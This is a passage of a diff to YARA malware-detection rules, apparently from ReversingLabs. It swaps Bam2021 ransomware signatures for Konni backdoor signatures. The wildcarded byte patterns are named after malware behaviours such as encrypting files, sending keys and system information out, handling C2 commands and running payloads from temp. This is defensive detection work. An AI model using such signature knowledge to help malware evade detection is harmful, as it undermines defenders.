?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57 + $generate_encrypt_and_send_key = { + 48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 48 89 78 ?? 41 56 48 81 EC ?? ?? ?? ?? + 8B F2 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 40 ?? 48 8B 08 8B 09 + E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 45 33 C0 45 8D 70 ?? 41 8D 50 ?? 41 8B CE E8 + ?? ?? ?? ?? 48 8B D8 83 F8 ?? 74 ?? 41 8D 6E ?? 48 8D 44 24 ?? 8B CD C6 00 ?? 48 FF + C0 48 FF C9 75 ?? 0F B7 CE 66 44 89 74 24 ?? E8 ?? ?? ?? ?? 48 8B CF 66 89 44 24 ?? + E8 ?? ?? ?? ?? 48 63 FB 48 8D 54 24 ?? 48 8B CF 44 8B C5 89 44 24 ?? E8 ?? ?? ?? ?? + 85 C0 74 ?? 48 8B CF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? BE ?? ?? ?? + ?? 48 8B CD 8B D6 E8 ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? 33 C9 8A 44 29 ?? 48 FF C9 88 + 44 0C ?? 48 FF CE 75 ?? 8D 56 ?? 44 8D 46 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B CF + 8B F0 85 C0 74 ?? 48 8D 54 24 ?? 45 33 C9 44 8B C0 E8 ?? ?? ?? ?? 3B C6 74 ?? 48 8B + CF E8 ?? ?? ?? ?? 33 DB 8B C3 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 6B ?? 49 8B + 73 ?? 49 8B 7B ?? 49 8B E3 41 5E C3 } - $create_test_file_p2 = { - 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 - 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? - 33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ?? - 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85 - ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75 - ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50 - 8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 - ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43 - 4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ?? - E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ?? - ?? ?? ?? C3 + $get_encrypt_and_send_system_info = { + 48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? + 8B F1 48 8B CA 48 8B DA FF 15 ?? ?? ?? ?? C6 44 24 ?? ?? 48 63 F8 40 88 7C 24 ?? 4C + 8B C7 85 C0 74 ?? 48 8D 44 24 ?? 48 2B D8 48 8D 4C 24 ?? 49 FF C8 4A 8D 0C 01 8A 04 + 0B 88 01 75 ?? 83 C7 ?? 48 63 DF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? F6 D8 48 8D 45 ?? 1A + C9 80 E1 ?? 80 C9 ?? FF C7 88 4C 1C ?? 8B CA C6 00 ?? 48 FF C0 48 FF C9 75 ?? 48 8D + 4D ?? 89 55 ?? FF 15 ?? ?? ?? ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 63 + CF FF C7 BB ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 CF 88 44 0C ?? 8A 45 ?? FF C7 48 + 63 CF FF C7 4C 8D 85 ?? ?? ?? ?? 88 44 0C ?? 8A 45 ?? 48 63 D7 88 44 14 ?? 8B 45 ?? + FF C7 48 63 D7 8D 4B ?? C6 44 24 ?? ?? 89 44 14 ?? 48 8D 54 24 ?? 83 C7 ?? 89 9D ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C0 8D 48 ?? 03 CF + 48 63 D1 48 83 FA ?? 76 ?? 44 8D 43 ?? 44 2B C7 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 + 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B + CA 48 FF C9 41 8A 04 09 88 01 48 FF CA 75 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 + 03 F8 C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? + ?? ?? 44 8B C0 8D 48 ?? 03 CF 48 63 D1 48 83 FA ?? 76 ?? 41 B8 ?? ?? ?? ?? 44 2B C7 + 48 63 C7 FF C7 4C 8D 54 24 ?? 44 88 44 04 ?? 48 63 C7 49 63 D0 4C 03 D0 45 85 C0 74 + ?? 4C 8D 4C 24 ?? 4A 8D 0C 12 4D 2B CA 48 FF C9 42 8A 04 09 88 01 48 FF CA 75 ?? 4C + 8D 4C 24 ?? 48 8D 54 24 ?? 44 03 C7 8B CE E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 + 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B E3 5D C3 } - $encrypt_files_p1 = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45 - ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50 - 6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ?? - ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB - ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + $copy_payload_into_allocated_memory = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 56 57 41 56 48 83 EC ?? 49 8B D8 48 63 F2 48 8B F9 41 + C6 00 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 66 C7 03 ?? ?? B8 ?? ?? + ?? ?? E9 ?? ?? ?? ?? 4C 8D 4C 24 ?? 4C 8D 44 24 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? + 8B E8 85 C0 74 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D6 33 C9 4C 8B F6 FF 15 + ?? ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 66 C7 03 ?? ?? FF 15 ?? ?? ?? ?? 89 43 ?? 8D 46 + ?? EB ?? 4D 8B C6 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 83 64 24 ?? ?? + 4C 8D 04 2E 45 33 C9 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 8B 44 + 24 ?? 48 8B 5C 24 ?? 48 8B 6C 24 ?? 48 83 C4 ?? 41 5E 5F 5E C3 } - $encrypt_files_p2 = { - 50 E8 ?? ?? ?? ?? 6A ?? 5F 89 7D ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 51 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? C6 45 ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 - ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 8D - 55 ?? FF 75 ?? 0F 43 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 8B 40 ?? 03 C8 8B 51 - ?? 83 CA ?? 8B C2 0B C7 39 71 ?? 0F 44 D0 52 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 59 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + $execute_payload_from_temp = { + 40 53 48 81 EC ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4C 8B D1 48 8D 44 24 ?? 41 8B D0 33 DB + 88 18 48 FF C0 48 FF CA 75 ?? 48 8D 44 24 ?? 8D 4A ?? 88 18 48 FF C0 48 FF C9 75 ?? + 48 8D 44 24 ?? 44 89 44 24 ?? 45 33 C9 48 89 44 24 ?? 48 8D 44 24 ?? 45 33 C0 48 89 + 44 24 ?? 48 89 5C 24 ?? 48 89 5C 24 ?? 49 8B D2 89 5C 24 ?? C7 84 24 ?? ?? ?? ?? ?? + ?? ?? ?? 89 5C 24 ?? 66 89 9C 24 ?? ?? 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C + 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? B0 ?? EB ?? 32 C0 48 81 C4 + ?? ?? ?? ?? 5B C3 } condition: - uint16(0)==0x5A4D and ($enum_rsrc) and ( all of ($search_files_p*)) and ( all of ($create_test_file_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($generate_system_id) and ($generate_encrypt_and_send_key) and ($get_encrypt_and_send_system_info) and ($copy_payload_into_allocated_memory) and ($execute_payload_from_temp) } -rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Bam2021 ransomware." + description = "Yara rule that detects Konni backdoor." author = "ReversingLabs" - id = "31ae99e3-223c-51fb-97c1-353ff063057f" - date = "2021-09-17" - modified = "2021-09-17" + id = "6fe230b1-357a-54f7-a9a8-15d0369fec71" + date = "2023-12-07" + modified = "2023-12-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Bam2021" + tc_detection_type = "Backdoor" + tc_detection_name = "Konni" tc_detection_factor = 5 importance = 25 strings: - $enum_shares = { - 83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 - ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E - 5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 - FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24 - ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C - 24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 - 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 - ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ?? - ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ?? - 75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 - ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ?? - ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33 - C0 5F 5E 5D 5B 83 C4 ?? C2 + $network_communication_p1 = { + 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? + 57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ?? + 50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? + 81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF + 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ?? + ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F + 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? + 6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56 + FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ?? + 5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? + ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89 } - $find_files_p1 = { - 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 - ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 - ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ?? - ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 - ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 - 83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24 - ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ?? - ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24 - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 - ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A - ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89 + $network_communication_p2 = { + 45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? + ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 + ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ?? + 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83 + C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ?? + 8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ?? + ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D + ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? + 56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ?? + 8B 45 ?? 5F 5E 5B 8B E5 5D C2 } - $find_files_p2 = { - 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A - ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44 - 24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ?? - ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? - ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ?? - ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F - B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ?? - 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B - ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B - 5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C - 24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 + $handle_c2_commands_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ?? + 50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? + 3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ?? + ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B + 4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B + 5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? + ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 } - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? - ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? - ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 - 83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 - EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54 - 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ?? - ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B + $handle_c2_commands_p2 = { + C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE + ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 + FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8 + 